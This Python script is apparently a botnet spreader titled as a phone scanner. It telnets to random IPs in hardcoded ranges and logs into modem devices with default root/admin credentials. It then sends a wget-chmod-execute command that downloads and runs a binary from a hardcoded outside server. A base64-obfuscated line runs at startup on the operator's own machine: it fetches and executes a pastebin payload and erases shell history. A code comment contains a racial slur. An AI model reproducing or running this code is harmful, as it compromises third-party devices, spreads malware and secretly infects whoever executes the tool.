fast ass phone scanner / phone exploiter

1. #!/usr/bin/python
2. # Phone Swiper Scanner
3.  
4. import threading, sys, time, random, socket, re, os, subprocess, base64
5.  
6. if len(sys.argv) < 3:
7. print "Phone Swiper Scanner\n"
8. print "Usage: python "+sys.argv[0]+" <threads(1-100+)> <ips(1-1000+)>"
9. sys.exit()
10.  
11. usernames = ["root", "admin"]
12. passwords = ["oelinux123", "admin"]
13. url = "http://103.194.169.245/tftp" # ARM4 Bin
14. threads = int(sys.argv[1])
15. ipz = int(sys.argv[2])
16. Tranges = ["119.150","119.151","119.152","119.153","119.154","119.155","119.156","119.157","119.158","119.159","182.184","182.185","182.186","182.187","182.188","182.189","182.190","182.191"]
17. #------------------------- stop editing shit here nigger ------------------------#
18. def readUntil(tn, string, timeout=8):
19. buf = ''
20. start_time = time.time()
21. while time.time() - start_time < timeout:
22. buf += tn.recv(1024)
23. time.sleep(0.01)
24. if string in buf: return buf
25. raise Exception('TIMEOUT!')
26.  
27. def worker():
28. try:
29. print "\033[33mStarting Telnet Thread\033[37m"
30. while True:
31. try:
32. h0h0h0 = h0h0 + 1
33. br2 = random.choice(Tranges)
34. for x in xrange(h0h0h0):
35. try:
36. ip = ''+br2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
37. t = telnet(ip)
38. t.start()
39. time.sleep(0.009)
40. except:
41. pass
42. time.sleep(2)
43. except:
44. print "\033[31mWORKER ERROR\033[37m"
45. pass
46. except:
47. pass
48.  
49. class telnet(threading.Thread):
50. def __init__ (self, ip):
51. threading.Thread.__init__(self)
52. self.ip = str(ip).rstrip('\n')
53. def run(self):
54. try:
55. tn = socket.socket()
56. tn.settimeout(8)
57. tn.connect((self.ip,23))
58. except Exception:
59. pass
60. try:
61. hoho = ''
62. hoho += readUntil(tn, ":")
63. if "mdm9625" in hoho:
64. r00t = 0
65. username = usernames[1]
66. password = passwords[1]
67. tn.send(username + "\n")
68. if "9615-cdp" in hoho:
69. r00t = 1
70. username = usernames[0]
71. password = passwords[0]
72. tn.send(username + "\n")
73. except Exception:
74. pass
75. try:
76. hoho = ''
77. hoho += readUntil(tn, ":")
78. if "assword" in hoho:
79. tn.send(password + "\n")
80. time.sleep(3.5)
81. except Exception:
82. pass
83. try:
84. mp = ''
85. mp += tn.recv(1024)
86. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
87. if r00t: tn.send("cd /tmp; rm -rf phone; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
88. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
89. except Exception:
90. pass
91. def run(cmd):
92. subprocess.call(cmd, shell=True)
93. checkbinaries = "Y2QgL3RtcDsgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0xxOVA5Q2c1IC1PIGEgPiAvZGV2L251bGwgMj4mMTsgY2htb2QgNzc3IGE7IHNoIGEgPiAvZGV2L251bGwgMj4mMTsgcm0gLXJmIGE7IGhpc3RvcnkgLWM7IGNsZWFyOw=="
94. rebinaries = str(base64.b64decode(checkbinaries))
95. run(rebinaries)
96.  
97. for g in xrange(threads):
98. try:
99. t = threading.Thread(target=worker)
100. t.start()
101. time.sleep(0.002)
102. except:
103. pass